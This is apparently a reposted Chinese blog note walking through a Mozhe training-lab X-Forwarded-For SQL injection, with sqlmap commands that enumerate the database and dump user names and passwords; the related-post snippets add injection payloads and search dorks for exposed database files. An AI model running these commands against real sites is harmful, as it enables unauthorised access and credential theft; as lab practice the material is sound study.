爆库记录(X-Forwarded-For注入漏洞实战 记录)

最新推荐文章于 2023-04-30 12:00:00 发布
最新推荐文章于 2023-04-30 12:00:00 发布
阅读量251 收藏
点赞数
文章标签: python 数据库
原文链接:http://www.cnblogs.com/kaibindirver/p/11522551.html
版权

环境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe

参考: http://www.freesion.com/article/176849949/  墨者里面的题 都有解

获取登陆地址的请求信息

 

 往请求头信息加入X-Forwarded-For:* 

一起写入 保存到本地txt文件 123.txt

 

执行sqlmap

搜索看有没有漏洞

sqlmap.py -r /Users/lucax/Desktop/123.txt

出现:(存在可以注入)

 

 

获取当前用户权限

sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user

 

 

获取当前数据库库名

sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs

 

 

 

获取数据库表名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables

 

 

获取表里面的字段名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns

 

 

获取字段对应的值

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user -C id,username,password --dump

 

 

转载于:https://www.cnblogs.com/kaibindirver/p/11522551.html

weixin_30684743
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
搭建discuz论坛并攻破盗取数据库
Cwillchris的博客
07-27 628
b、使用/utility/convert/index.php进行版本转换时,会自动创建utility/convert/data/config.inc.php文件。保存好这个地址/var/www/html/discuz/utility/convert/data/192.168.98.66_MySQL.sql。注/var/www/html/utility/convert/data/config.inc.php这个文件原来的网站上没有的。echo"helloworld";...
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7644
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求头中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求头,以及remote_add
x-forwarded-for手工注入(超详细)
1
05-12 1120
使用靶场来进行演示。 访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下 虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己加上。 发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...
SQL注入爆库渗透测试(初学者必看)
最新发布
yi152787的博客
04-30 1926
爆库原理基本一致的,也许站点不同但只要存在sql注入则需要进行数据库爆破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap爆破工具对SQL靶场进行渗透测试(数据库爆破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接爆出用户名和密码的。5.在security爆出users,已确定目标所在,进行第三步爆破 所使用到的参数 -D -T --colimn;
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4508
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
Chrome插件:X-Forwarded-For Header
12-15
`X-Forwarded-For`(简称XFF)头是一个在HTTP协议中广泛使用的非标准头,它用于记录客户端的真实IP地址,特别是在通过代理服务器或负载均衡器访问Web服务时。 **X-Forwarded-For Header 描述** 在描述中提到的“X-...
forwarded:解析HTTP X-Forwarded-For标头
05-11
从请求中解析X-Forwarded-For标头。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
X-Forwarded-For Header_0.6.2_0.zip
08-24
此扩展允许您快速更新各种 X-Forwarded-For、X-Originating-IP、X-Remote-IP 和 X-Remote-Addr HTTP 标头 打开Chrome浏览器的扩展程序: 地址栏直接输入:chrome://extensions/ 把下载到的文件解压后,点击加载已...
x-forwarded-forheader1.0.1.1.1
05-01
x-forwarded-forheader1.0.1.1.1火狐老插件,可以直接本地安装在旧版火狐上面,可以用的。
爆库漏洞全解
网络小虾
08-21 2092
用挖掘鸡找到网站漏洞,很多网站不修改默认数据库: 文件名:dvbbs6.mbd、dvbbs7.mbd 目录组:/data、/databackup 关键词:dvbbs 动网论坛 欢迎 许愿版漏洞: 文件名:wish.asp 目录组:/wish 关键词:许愿版 爆库漏洞:暴库一般加%5c或者inc,让系统调用数据时出现错误,然后返回数据库提示调用数据出现错误,错误数据里面一般含有数据库...
SQL注入爆库利用方法
afei001
04-23 1067
爆库 定义:通过一些技术手段或者程序漏洞得到数据库的地址,并将数据库非法下载到本地。黑客在得到网站数据库后,就能得到网站管理账号,对网站进行破坏与管理,同时黑客也能通过数据库得到网站用户的隐私信息,甚至得到服务器的最高权限。 爆库利用方法(百度已屏蔽,最好用google) 1.inurl:/inc/conn.asp afei 2.inurl:/inc+co...
墨者学院HTTP头注入漏洞测试(X-Forwarded-for)
qq_43817824的博客
07-24 1207
打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。 设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。 3.order by 判断表数量,最后发现是4 4.union select 1,2,3,4测试其注入点的位置是在4,通过union select 1,2,3,(...
HTTP头注入漏洞测试(X-Forwarded-for)
jeehoon的博客
11-15 718
用bp抓墨者任性网站的包,发送给repeater模块,自己填入X-Forwarded-For,然后判断是否可注入。 输入and 1=1发现没有报错,证明存在注入点 用order by判断表的数量 输入到5就报错了,说明只有4个表 构建语句union select 1,2,3,4 发现名称,价格,数量都对应这些数字 通过union select 1,2,3,(select group_conc...
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 6970
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
浅析爆库和社工库扫描
weixin_34055910的博客
01-01 658
背景 最近有关国内外互联网企业的密码安全问题受到了严峻的挑战和社区的广泛关注。腾讯安全团队的技术专家介绍了有关暴库和社工库扫描的内容。 常见密码存储方式对于用户来讲,用户密码信息显然是非常重要的,我们当然有必要了解社区管理者是如果保存我们的机密信息的。目前网站中主流存放用户名和密码的方式有三种: 明文存放。这种网站的用户数据特别危险,网站被黑客拿下,用户数据直接那走。可逆加密存放。你的密码会被加密...
伪造 X-Forwarded-For
热门推荐
intel80586
05-09 3万+
背景 应同学的要求,帮忙刷票。我上去看了一下,对方网站做了IP限制,一天之内一个IP只能投一票,并没有使用cookie校验,验证码校验等技术,总体来说这个网站的情况是比较常见的,常见的解决办法有两个: 使用大量的真实IP刷票 如果你使用的是一个拨号上网的网络,每次的拨号都能随机分配IP,这种情况下,可以使用投票一次,拨号一次的方法来实现刷票,但这个方案有两个问题: 1. 编程稍微复杂,
x-forwarded-for注入漏洞实战
03-17
x-forwarded-for注入漏洞是一种常见的网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来绕过IP地址过滤和访问控制,从而实现攻击目标系统的目的。攻击者可以利用这个漏洞来进行各种攻击,比如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值